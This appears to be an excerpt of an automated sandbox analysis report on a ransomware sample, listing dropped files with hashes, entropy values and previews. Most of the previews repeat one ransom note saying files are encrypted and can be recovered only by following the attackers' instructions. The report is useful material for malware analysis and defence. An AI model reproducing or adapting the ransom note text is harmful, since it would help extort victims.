                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1227
                                                              Entropy (8bit):7.850378289608763
                                                              Encrypted:false
                                                              SSDEEP:24:7459cJa6Uda7VkjxDy5guXm/sm0+QdnfGRlXw+5Aagp6ysVwhoPUAwt6Dh9nnrM2:7quCdhyOeOB0+QdfGRG+WZXoPUCMoV
                                                              MD5:42392924FBDC52D8856DDE802D996E74
                                                              SHA1:E752211AA57D7C270F45387E09CEAC1A3DBDE7D4
                                                              SHA-256:F558B3DBFF6534BCD80D124F57824409FFC8407DD98F2B96ECB014488EBDFDF2
                                                              SHA-512:720E0F0A99BCFD013C084DEBF396F9E7DF0AA11FD4B358240A6675FE00F8FF5F1B26AD1305B3B134254B7BACA27241AB416175BFB810F2CFC381595C56096877
                                                              Malicious:false
                                                              Preview:../k%*.6...v.....-..96.y....F....2.:.B;.x_...........h....6.&....Y.G.G...?..a-5...M.....w"..$.\..".1.C...RL..A.Lq..|.h..y....L..).$...N'it..u..FF.=......e...\.T....y.>..A.y...I..:.....C`.j.k...#.e..aL`5,#.o.@".....k........8x.....k.....t.v.IT%`..../Cit..cE.].OPv,f].........w.^.0..Rlc3n..D.rl.d.O1%..%.....4i.....Q$C.2M..A...9...$U..7.dT...@Xe.R[...q.b.G..i8..........:..-P..\.O..+.:.3.<...?.+Fl.op/..k.TR.:...).A..z..0.Z.[.2......Ye\../.<.-.r.......{ujT. .?.$...|....X....R|_.#.F.6.3..v.4.......x....j+6..9..].{9..B.3...]o..j.`.l.F.H..|..3.Q.....A..^.5....I..WF.).......S.....0.9..:bi~w..!~>./.w..@<$..$3.......o..&Nf..w./......nra.H.V.....ht?A....*.<..W.L...Y....w...s.....z...MuW..../..+#{.=.D.=....L..)....o.b...H....E.....T.Qz:J...U..:-.{ A.e......b..d3~..`....o.....x">..m....2.f.@.[...N.......X%.K.[...".T.~k..~.^...H....Xh..0f....s..L.f.1`F......Ho..V.*..<..E...P..%....9..S.....*......'D.l....`U......U.f.Ecf. ki*....g....l.]V...7...m.....S..rz'../.U
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
